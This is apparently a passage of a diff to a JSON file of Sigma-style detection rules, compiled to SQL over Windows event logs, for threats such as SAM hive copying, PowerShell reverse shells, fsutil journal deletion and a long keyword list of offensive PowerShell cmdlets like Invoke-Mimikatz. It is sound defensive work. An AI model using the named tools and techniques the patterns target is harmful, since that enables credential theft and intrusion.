'\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR 
((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox 
methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": 
"test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Fsutil Suspicious Invocation", + 
"id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
